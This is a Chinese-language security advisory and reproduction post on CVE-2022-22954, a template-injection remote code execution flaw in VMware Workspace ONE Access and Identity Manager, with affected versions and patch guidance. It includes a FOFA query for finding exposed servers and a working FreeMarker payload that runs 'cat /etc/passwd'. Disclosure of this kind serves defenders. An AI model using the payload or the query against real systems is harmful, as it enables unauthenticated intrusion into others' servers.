一 漏洞介绍
近日,VMware 官方测试中心发布了关于 Workspace ONE Access (前称 VMware Identity Manager)的多个漏洞补丁,其中曝光了一个服务器模板注入导致的远程命令执行漏洞(CVE-2022-22954),两个 OAuth2 ACS 身份验证绕过漏洞(CVE-2022-22955, CVE-2022-22956),两个 JDBC 注入导致的远程命令中执行漏洞(CVE-2022-22957,CVE-2022-22958)。
Workspace ONE Access 是 VMware 公司开发的一款智能驱动型数字化工作空间平台,通过 Workspace ONE Access 能够随时随地在任意设备上轻松、安全地交付和管理任意应用。
VMware Workspace ONE Access 及 Identity Manager 存在一个由服务器模板注入导致的远程命令执行漏洞,未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。
该漏洞编号CVE-2022-22954,CVSS评分:9.8,危害等级:严重
二 受影响版本
VMware Workspace ONE Access Appliance (版本号:20.10.0.0 ,20.10.0.1 ,21.08.0.0 ,21.08.0.1 )
VMware Identity Manager Appliance (版本号:3.3.3 , 3.3.4 , 3.3.5 ,3.3.6)
VMware Realize Automation (版本号:7.6)
三 FOFA查询
app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager"
四 漏洞复现
${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
五 修复建议
参考漏洞影响范围进行排查。
目前官方已发布修复补丁,请查看官方消息进行修复:
https://kb.vmware.com/s/article/88099
六 参考文章
https://mp.weixin.qq.com/s?__biz=Mzg3MTU0MjkwNw==&mid=2247489074&idx=1&sn=6de1e590a02833dc65acf5c4d5bd5ed9
https://mp.weixin.qq.com/s?__biz=MzAwMjQ2NTQ4Mg==&mid=2247489068&idx=1&sn=b46228d2ad0871f0ddac7be8de03a7d6
https://nosec.org/home/detail/4988.html
原文始发于微信公众号(Reset安全):VMware Workspace ONE Access RCE CVE-2022-22954 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论